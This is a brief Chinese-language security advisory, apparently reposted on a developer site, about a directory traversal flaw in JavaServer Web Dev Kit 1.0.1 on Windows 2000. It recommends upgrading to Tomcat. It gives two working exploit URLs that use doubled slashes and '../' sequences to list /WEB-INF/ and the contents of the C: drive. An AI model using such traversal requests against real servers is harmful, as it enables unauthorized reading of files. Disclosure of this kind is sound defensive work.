JavaServer Web Dev Kit(JSWDK) for win2000 目录遍


涉及程序:
JavaServer Web Dev Kit(JSWDK)
描述:
JavaServer Web Dev Kit(JSWDK) for win2000  目录遍历漏洞
详细:
发现装了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS  NT/2000 系统存在漏洞,
攻击者通过构造特殊的 URL 请求能访问未授权文件。
exploits:
http://localhost:8080/examples//WEB-INF/
会列出 /WEB-INF/ 目录 .
http://localhost:8080/../examples//WEB-INF/../../../../../
如果 JSWDK 被装在 c: ,此请求将会列出 c: 下所有目录和文件
受影响系统:
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000
解决方案:
CNNS 建议您升级 JSWDK 版本
建议您升级到tomcat. 本文作者:



相关阅读:
重载toString实现JS HashMap分析
扩展JavaScript的时候,千万要保留其原来的所有功能
Oracle 10g下修改VIP地址的方法
javascript window 属性和方法
Linux在国内整机市场全面狙击微软
Linux下通过Samba添加Windows共享打印机
当文本框的值发生改变时,触发事件,在IE中有效
javascript 得到变量类型的函数
js 面向对象的技术创建高级 Web 应用程序
Windows Vista防火墙十大使用技巧
oracle ora-00003错误解决办法
asp 动态生成rss(不成生xml文件)代码
jQuery 打造动态渐变按钮 详细图文教程
FreeBSD内核定制参考
快速导航

Copyright © 2016 phpStudy | 皖ICP备18014864号-4